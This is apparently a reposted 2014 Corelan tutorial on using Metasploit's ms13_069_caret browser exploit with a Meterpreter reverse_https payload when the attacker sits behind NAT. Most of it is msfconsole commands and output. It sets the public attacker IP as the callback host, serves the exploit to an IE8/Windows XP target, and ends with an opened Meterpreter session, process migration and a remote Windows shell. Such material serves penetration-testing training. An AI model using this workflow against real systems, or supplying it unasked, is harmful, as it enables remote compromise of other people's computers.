||| ||| =[ metasploit v4.9.0-dev [core:4.9 api:1.0] + -- --=[ 1248 exploits - 678 auxiliary - 199 post + -- --=[ 324 payloads - 32 encoders - 8 nops msf > use exploit/windows/browser/ms13_069_caret msf exploit(ms13_069_caret) > Show the options: msf exploit(ms13_069_caret) > show options Module options (exploit/windows/browser/ms13_069_caret): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 IE 8 on Windows XP SP3 The exploit requires a SRVHOST and SRVPORT. These 2 variables will be used by Metasploit to determine where the webserver needs to bind to and listen on. The plan is to trick the target to connect to this webserver, using the public IP of our firewall/router, which will then forward the traffic to our Metasploit instance. We can't tell the Metasploit webserver to listen to the public IP of our router, because it won't be able to "bind" itself to that IP address. If we use 0.0.0.0, the Metasploit webserver will simply listen on all interfaces for incoming traffic. In other words, you can leave the SRVHOST to 0.0.0.0, or you can set it to the LAN IP of the Kali box itself (192.168.0.187 in this case). I'll just leave the default 0.0.0.0. Next, we need to change the port to 80, and we'll set the URIPATH to / (so we can predict what the URI will be, instead of letting Metasploit create a random URI): msf exploit(ms13_069_caret) > set SRVPORT 80 SRVPORT => 80 msf exploit(ms13_069_caret) > set URIPATH / URIPATH => / Next, let's select the meterpreter reverse_https payload for windows. If we run "show options" again, we'll see this: msf exploit(ms13_069_caret) > set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https msf exploit(ms13_069_caret) > show options Module options (exploit/windows/browser/ms13_069_caret): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH / no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_https): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST yes The local listener hostname LPORT 443 yes The local listener port Exploit target: Id Name -- ---- 0 IE 8 on Windows XP SP3 msf exploit(ms13_069_caret) > The Module options (SRVHOST and SRVPORT) are set the way we want it. The Payload options require an LHOST and LPORT. Based on the output above, the LPORT is already set to 443. This is the port where the Meterpreter reverse connection will attempt to connect to. If it was not set to 443 already on your box, simply run "set LPORT 443" to make sure the Meterpreter handler will listen on port 443: msf exploit(ms13_069_caret) > set LPORT 443 LPORT => 443 Note: In any case, to keep things as easy as possible, try to use the same ports for a specific "service". That is, if you host the webserver on port 80 on the firewall, try to make sure to also forward traffic to port 80 on the attacker/Metasploit box, and host the exploit on port 80 in Metasploit. The same thing applies to the payload. If we serve the payload on port 443, make sure to use this port everywhere. LHOST serves 2 purposes : It indicates the IP address where the Meterpreter shellcode will have to connect back to (from the target, to the attacker). It tells Metasploit where to bind to when setting up the Meterpreter "handler". Since our attacker host is behind NAT, we have to use the public IP address of the router/firewall as LHOST. When the exploit is executed, this IP will be embedded in the shellcode and when the initial Meterpreter shellcode runs on the target, it will connect back to this IP address. The port forwarding on our router/firewall will then forward traffic to our LAN IP of the attacker host. For this reason, we need to set LHOST to 1.1.1.1 (the public IP of your attacker router/firewall) Using a public IP as LHOST also means that Metasploit will attempt to bind itself to that IP when setting up the Meterpreter handler. Since this IP belongs to the router/firewall and not to the Metasploit instance, this will obviously fail. The good thing is that Metasploit will automatically fall back to 0.0.0.0 and basically serve the Meterpreter handler on all local IPs on the attacker host, while remembering that LHOST was set to our public IP address. This is exactly what we need. Set LHOST to 1.1.1.1 msf exploit(ms13_069_caret) > set LHOST 1.1.1.1 LHOST => 1.1.1.1 If we don't really want the Meterpreter handler to fall back to 0.0.0.0, we can use one of the "advanced" options and tell it to listen on the LAN IP address: msf exploit(ms13_069_caret) > set ReverseListenerBindAddress 192.168.0.187 ReverseListenerBindAddress => 192.168.0.187 and then fire up the exploit: msf exploit(ms13_069_caret) > exploit [*] Exploit running as background job. [*] Started HTTPS reverse handler on https://192.168.0.187:443/ [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://192.168.0.187:80/ [*] Server started. The output shows us that http://0.0.0.0:80 (or http://192.168.0.187:80) is hosting the browser exploit. If the target connects to http://1.1.1.1, traffic will be forwarded to the Kali box on port 80 and serve the exploit. The HTTPS reverse handler is listening on 192.168.0.187, port 443. What we don’t see in the output is the fact that the actual Meterpreter shellcode contains IP address 1.1.1.1 to connect back to. That value is taken from the LHOST variable. If you didn’t use ReverseListenerBindAddress and you get something like the output below after running "exploit", then check the following check that the port is free to use make sure you are running the latest version of Metasploit set the ReverseListenerBindAddress to your local LAN IP or to 0.0.0.0 exit msfconsole and open it again. under certain scenario’s, you’ll notice that the bind doesn’t get properly cleaned up if you ran a session before. msf exploit(ms13_069_caret) > exploit [*] Exploit running as background job. [-] Exploit failed: Rex::AddressInUse The address is already in use (0.0.0.0:443). If we now use IE8 (from IECollection) on the target and connect to the public IP of our attacker router/firewall on port 80, we should see this: msf exploit(ms13_069_caret) > [*] 2.2.2.2 ms13_069_caret - Sending exploit... [*] 2.2.2.2 ms13_069_caret - Sending exploit... [*] 2.2.2.2:53893 Request received for /NtFT... [*] 2.2.2.2:53893 Staging connection for target /NtFT received... [*] Patched user-agent at offset 663128... [*] Patched transport at offset 662792... [*] Patched URL at offset 662856... [*] Patched Expiration Timeout at offset 663728... [*] Patched Communication Timeout at offset 663732... [*] Meterpreter session 1 opened (192.168.0.187:443 -> 2.2.2.2:53893) at 2014-01-05 09:24:26 +0100 [*] Session ID 1 (192.168.0.187:443 -> 2.2.2.2:53893) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (2952) [*] Spawning notepad.exe process to migrate to [+] Migrating to 500 [+] Successfully migrated to process msf exploit(ms13_069_caret) > sessions -i 1 [*] Starting interaction with 1... meterpreter > shell Process 592 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] © Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\peter\Desktop> 2.2.2.2 is the public IP of the target. Metasploit is sending the payload when the target connects to port 80, exploits the browser and executes the initial meterpreter payload. This payload will download metsrv.dll (which gets patched by Metasploit first, so it would contain the attacker public IP and port), loads it into memory (using reflective load) and runs the code. When that is done, you get a full Meterpreter session. Life is good. So, in a nutshell, set the following variables and you should be good to go: SRVHOST : 0.0.0.0 SRVPORT : set to the port where you want to host the browser exploit LHOST : the attacker public IP LPORT : set to the port where you want to serve the Meterpreter handler ReverseListenerBindAddress : LAN IP (optional) If, for whatever reason, you also want to host the Meterpreter handler on another port than what the client will connect to, then you can use LPORT to specify where the target will connect back to, and use ReverseListenerBindPort to indicate where the handler needs to listen to. Obviously, you’ll need to make sure the port forwarding will connect to the right port on your attacker machine. © 2014, Corelan Team (corelanc0d3r). All rights reserved. Sursa: https://www.corelan.be/index.php/2014/01/04/metasploit-meterpreter-and-nat/
-
- 1
-